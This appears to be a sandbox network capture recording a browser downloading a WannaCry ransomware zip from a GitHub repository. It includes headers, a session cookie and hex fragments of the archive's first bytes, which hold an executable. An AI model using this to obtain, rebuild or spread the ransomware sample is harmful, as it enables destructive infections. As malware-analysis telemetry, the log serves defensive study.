                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:31 UTC436INHTTP/1.1 400 Bad Request
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: application/json
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:31 UTC2913INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      156192.168.2.1649874140.82.113.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:31 UTC943OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/deferred-metadata/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      If-None-Match: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
                                                                                      2024-03-23 14:47:32 UTC523INHTTP/1.1 304 Not Modified
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:27 GMT
                                                                                      Content-Type: application/json; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"3ca1cb8ac06e96da0082e70bd7b7c408"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:32 UTC2893INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      157192.168.2.164987340.68.123.157443
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:32 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=W+gOxC5MR2PNrAs&MD=WW3wwygw HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Accept: */*
                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                      Host: slscr.update.microsoft.com
                                                                                      2024-03-23 14:47:32 UTC560INHTTP/1.1 200 OK
                                                                                      Cache-Control: no-cache
                                                                                      Pragma: no-cache
                                                                                      Content-Type: application/octet-stream
                                                                                      Expires: -1
                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                      MS-CorrelationId: 91e87adf-42a2-4994-b6e5-95242a1e1cce
                                                                                      MS-RequestId: 519dd576-34ff-46e0-8ce9-d0fb9da1b579
                                                                                      MS-CV: 5zENhA6tkEyhIlde.0
                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Date: Sat, 23 Mar 2024 14:47:31 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 24490
                                                                                      2024-03-23 14:47:32 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                      Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                      2024-03-23 14:47:32 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                      Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      158192.168.2.1649875140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:32 UTC1114OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/raw/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:33 UTC617INHTTP/1.1 302 Found
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:33 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                      Location: https://raw.githubusercontent.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/master/Ransomware.WannaCry.zip
                                                                                      Cache-Control: no-cache
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                      2024-03-23 14:47:33 UTC2911INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      159192.168.2.1649876185.199.108.1334436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:33 UTC680OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/master/Ransomware.WannaCry.zip HTTP/1.1
                                                                                      Host: raw.githubusercontent.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Origin: https://github.com
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:33 UTC884INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 3481589
                                                                                      Cache-Control: max-age=300
                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                      Content-Type: application/zip
                                                                                      ETag: "fac34b01ee946a0c48a8bcb27070461075d685f5c74c2a17e9db2873c0b74b41"
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-Frame-Options: deny
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      X-GitHub-Request-Id: E87A:5515:386FD5:45B7E7:65FEEB85
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:33 GMT
                                                                                      Via: 1.1 varnish
                                                                                      X-Served-By: cache-lga21952-LGA
                                                                                      X-Cache: MISS
                                                                                      X-Cache-Hits: 0
                                                                                      X-Timer: S1711205254.654389,VS0,VE88
                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      X-Fastly-Request-ID: eefd70a187b6ebc0923e22bd41074c74909270ab
                                                                                      Expires: Sat, 23 Mar 2024 14:52:33 GMT
                                                                                      Source-Age: 0
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: 50 4b 03 04 14 00 09 00 08 00 a4 5b ae 4a aa fc 22 40 c7 1e 35 00 00 a0 35 00 44 00 1c 00 65 64 30 31 65 62 66 62 63 39 65 62 35 62 62 65 61 35 34 35 61 66 34 64 30 31 62 66 35 66 31 30 37 31 36 36 31 38 34 30 34 38 30 34 33 39 63 36 65 35 62 61 62 65 38 65 30 38 30 65 34 31 61 61 2e 65 78 65 55 54 09 00 03 b3 69 18 59 99 6a 18 59 75 78 0b 00 01 04 e8 03 00 00 04 e8 03 00 00 63 ea c7 a4 7c 0e 21 39 08 17 89 cb 54 da f0 0e ad 49 f7 da 5e 9a 5a a6 40 bf 24 3a a5 96 f2 2d 00 68 cf 1e b3 2a c0 9b 20 b7 d1 78 7b 26 3a d5 d9 f8 c6 61 fa 84 a3 07 a3 fd f9 0e 86 19 44 7e 26 80 cd 18 9e 5e 41 ef 40 4e a2 df d6 87 fc dd 28 f3 62 fe cf 55 ce 61 af f9 b6 da c5 66 bf 4e 29 e7 2f 3f ce a4 8e 9a 65 28 a8 ea d1 33 34 23 00 11 a7 e8 fb e2 06 52 8b 1f 7f 97 c0 85 f5 5b 29
                                                                                      Data Ascii: PK[J"@55Ded01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUTiYjYuxc|!9TI^Z@$:-h* x{&:aD~&^A@N(bUafN)/?e(34#R[)
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: b1 b1 32 43 6a 69 b4 de 29 6a 81 97 d1 fc 3d ec 31 e7 17 0e 0f fb d2 13 c2 26 71 6f db aa 97 b6 67 2b eb ca c4 f3 4c 22 44 71 2c 2f ab e4 fe bc 51 bb ae 73 b2 90 49 b6 44 40 18 b4 e5 9e 63 74 89 10 ef c1 94 19 dd e1 44 df 95 c4 bc 18 79 1a 0e a9 1c 2b a4 09 57 06 b6 86 0b 0a 4a df 7b cd f4 fb 2e b2 56 bd e0 79 da 8e b8 47 4e 4c 18 3d ec d3 19 c3 78 50 cb 98 73 b8 ef b3 8e d3 25 3d d4 54 46 92 15 d2 76 28 55 ee fe 20 9f 96 c2 2d e2 aa 4a 93 55 ca 8c 4e 31 0f 56 da 0d a0 c6 48 36 a9 7c a6 b7 f6 c2 a6 59 e1 f7 eb 3c 77 91 31 77 ce d0 41 f5 4e d0 9b 7e f8 97 9c 6d 1f c9 17 73 e4 38 87 ac 67 d2 0a 92 89 f5 8c 1d 02 01 32 fc 31 3f 1d f8 88 4b bb 21 12 21 b7 8c 92 e0 0b cc 67 d6 08 d4 9d 66 b6 48 d4 18 64 dc 64 b5 3d 8e 24 66 cc 6e fd eb 55 bb 41 ab 79 9d 8f f1
                                                                                      Data Ascii: 2Cji)j=1&qog+L"Dq,/QsID@ctDy+WJ{.VyGNL=xPs%=TFv(U -JUN1VH6|Y<w1wAN~ms8g21?K!!gfHdd=$fnUAy
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: da 79 56 99 c0 6d 8b a5 63 9b eb 19 7f 1f d5 b8 ed 19 b3 91 6c f9 d9 61 ba 74 d2 9b bd e0 71 f6 86 4d e0 47 a0 ec b4 81 d9 b9 1c 84 15 8b 98 08 b9 5e ca 01 b9 99 74 b2 88 df af 66 65 cc 98 cc c9 92 26 fe 66 35 c7 15 e8 e3 6b c9 86 54 cd 9f df ef 7d 47 3d 2b bd 7d 99 bb 60 22 c5 97 31 ee 22 d5 7e 49 84 df 8b 30 07 62 97 ee a7 39 5d 16 e3 bb 6d 22 de b0 a7 02 2d f4 9f ef 3d e9 f5 d1 28 08 46 d2 a1 00 ce 37 56 6a 1c 2f 4b 05 81 01 ef 51 44 86 26 41 b5 a5 de c1 e2 b5 34 46 71 6d 65 fd 59 00 89 fc a5 cb c7 d2 d5 af de e8 24 4c 95 fc f1 d8 7a bd 20 6d 31 87 78 1b 7d c9 ed 6f c9 f4 06 46 01 f9 ac 0e 46 06 9c 9f 05 c0 d4 f2 cc bc 2d 36 84 d5 d1 6c 95 14 0e f8 80 97 8f a4 e5 84 46 86 f7 e4 46 ec 74 67 e6 cc 13 a4 8b 08 c2 6e a8 15 c2 7b 29 e6 cc 21 2e ab 78 24 be
                                                                                      Data Ascii: yVmclatqMG^tfe&f5kT}G=+}`"1"~I0b9]m"-=(F7Vj/KQD&A4FqmeY$Lz m1x}oFF-6lFFtgn{)!.x$
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: 64 f1 0b 10 bb 70 ef d8 51 ab c9 76 24 65 06 4a 75 6c 33 89 cf b4 22 70 e2 2b ce 40 5e d4 d8 47 88 40 c5 a7 1e 45 d9 62 8b f1 a1 8e 18 df df 61 69 8d db 32 b9 29 f4 ba 1c d0 d0 9b 6f 44 2d f7 0e 63 16 5c 6f 32 b5 59 5c 1e 41 2a 6e f7 0f b8 af 27 05 2e 51 8e f5 aa 7b a8 2c 75 73 a3 cd a1 4a c3 e4 1e f9 28 a0 86 1a 9c 15 81 71 5b fc ee 8d 43 65 2c 72 9c 8b 17 0f 69 ce b0 ee 85 0b 2f 35 08 d3 44 e8 6c eb 3e 92 9b d5 61 c2 2a 51 df 4a 49 b2 3e 73 ff fa c6 8d 19 72 c4 09 ab 23 8c bc 05 27 82 25 88 49 fc e9 3f f8 1d 60 b3 ee 1b c7 b7 df 72 66 e3 9f ee 35 32 86 55 5d e1 71 bc 41 d7 76 30 24 98 b8 c6 fb ce 07 10 e2 fd 52 6f bd 4d 77 44 51 cd ce 90 f5 c4 31 11 de 74 91 b5 b2 57 fc 4e 09 90 3f 88 6e 9a cc 54 6b 8a d6 1c 42 5c e9 95 ef dd 3c e3 c4 cd dd ed f3 c2 a2
                                                                                      Data Ascii: dpQv$eJul3"p+@^G@Ebai2)oD-c\o2Y\A*n'.Q{,usJ(q[Ce,ri/5Dl>a*QJI>sr#'%I?`rf52U]qAv0$RoMwDQ1tWN?nTkB\<
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: 6c e4 0a fd 3e 01 83 a5 a8 1e 0f 24 2d 17 15 b5 a2 98 b1 33 c0 d1 fd d1 f2 dd 7a b3 00 92 c7 68 e8 42 a2 93 ea c5 dc aa 42 de 2e ad cf e0 a4 5e 73 fe ed 3d 25 f8 15 d3 a2 a0 99 b7 b0 0e 77 95 ac 34 7b cf 3b 7d b2 05 3c d0 da 76 4c 53 fe 3f 45 39 b2 27 0d 5a fa 87 10 6b bf 3c fe e4 c7 08 a1 f3 4e fc ba 5f 4c c2 05 ec 72 a2 56 16 2f ac 20 fa 08 8a 15 97 65 4b e8 7d d0 93 ad 89 b6 39 11 8b 5b e8 8c 29 3d f0 35 28 be 2f 91 94 11 ae 85 4c a6 ae da 7d 0c 8a 5e 75 b4 ae 04 da 34 57 76 13 94 41 f2 78 2d 5d f0 11 15 ee 26 1a e3 8f 0c be 38 57 7a 8b d9 df 5e 2d c6 8c 4c 0a ee 20 63 a5 c6 7c 28 d7 7b 20 cc 07 a2 d7 e4 b2 f9 80 63 04 f7 e7 ff 6d 37 e1 a8 a5 19 15 67 d9 3c c9 48 fa 0d 48 ad 34 91 bc 99 42 4b f2 08 0e 6b fd b5 6d 6e 28 c7 14 22 e9 53 ca 5a ad 02 f4 a5
                                                                                      Data Ascii: l>$-3zhBB.^s=%w4{;}<vLS?E9'Zk<N_LrV/ eK}9[)=5(/L}^u4WvAx-]&8Wz^-L c|({ cm7g<HH4BKkmn("SZ
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: 87 d9 6e fb 52 7b 99 7b 72 c5 49 8b 0d d5 9c db 6e 48 39 d7 b9 68 a1 f3 34 7e c2 57 41 71 e1 65 a3 2f 79 de b8 58 d2 2b d5 1f 04 85 6b 77 4f b4 c5 08 3b 86 b7 38 2b 40 4d 3c 40 2a f5 d3 84 9b 50 29 36 af 30 1d 28 38 1a 77 53 63 31 76 97 d7 c5 5d 2d 7e e7 c6 8a f4 08 3b d8 bc aa bd 2d 2a be 3e 1e a3 ce bb e8 30 ee 0b 21 54 0b 7b 1b ba f2 d5 59 86 17 09 84 65 b3 bc 10 81 e1 d7 19 6b 2e fd c7 7a d2 4a 4b 23 84 f8 53 a4 c8 71 c4 30 ae b6 fa 38 26 9e 2c 32 fb f2 41 59 dc f7 bb 5e fe 8b e7 7d f0 53 17 de 68 b0 9d 80 9f 48 04 16 96 07 18 49 46 32 e3 09 ce 38 78 d4 96 eb 14 3f 1b 81 9e 73 a7 c2 62 f6 df 55 19 84 a4 95 b7 d5 8a cf de 7d f7 c0 86 9d 83 54 3b 6b 9c 74 21 ff 69 ea d9 35 5b e8 a6 d1 3c d5 87 6d 37 2d da 1e f5 e3 eb 53 59 82 2e 5c 36 31 36 9b 09 09 51
                                                                                      Data Ascii: nR{{rInH9h4~WAqe/yX+kwO;8+@M<@*P)60(8wSc1v]-~;-*>0!T{Yek.zJK#Sq08&,2AY^}ShHIF28x?sbU}T;kt!i5[<m7-SY.\616Q
                                                                                      2024-03-23 14:47:33 UTC16384INData Raw: 33 de f4 1f 97 c8 d6 07 32 c1 c9 cc 78 60 ff 64 31 14 ad 74 b3 35 8e 59 cb 5c f2 6f 6b 7d 95 98 3d 12 63 dc b3 5e 5f 08 17 0d 10 2a 2d 88 35 cb d9 62 63 cc 20 6c 63 83 73 c1 7d 4c 53 65 7f 84 a8 7c ac d9 ca 09 ec c8 0a 6d cb 19 58 3d 11 1f cc 1a 79 cc bf a6 11 0c b6 a6 d4 c6 77 03 c6 67 60 a0 86 c4 72 3f 56 25 fb 3e 0a f2 a5 97 16 38 85 66 9a 89 3d 20 be cc ea a1 88 84 1c d4 e4 e9 72 d4 d4 f7 3b e9 f8 20 0c f0 b0 92 a1 f2 d9 f8 b3 34 3e c8 22 9f 94 99 f5 bd f9 7f fc 68 7b 3b fa 25 d6 41 0e 16 7c 9a d7 2e b8 8c 0d c0 98 fc bd 3e f6 55 94 5b 7a 04 9d 46 86 23 c4 32 73 e3 88 8e b7 55 d5 ba e4 a7 6e 90 e8 cd bf a5 84 46 d9 86 9b 24 68 2e d8 a5 16 7c 2d 75 19 64 2a ab 99 19 b0 ce 52 8d 1a 5e b5 a7 3c 02 0d 4a cd d2 f4 00 92 04 63 6e e8 67 c3 f5 2e 5c 9a c2 fe
                                                                                      Data Ascii: 32x`d1t5Y\ok}=c^_*-5bc lcs}LSe|mX=ywg`r?V%>8f= r; 4>"h{;%A|.>U[zF#2sUnF$h.|-ud*R^<Jcng.\
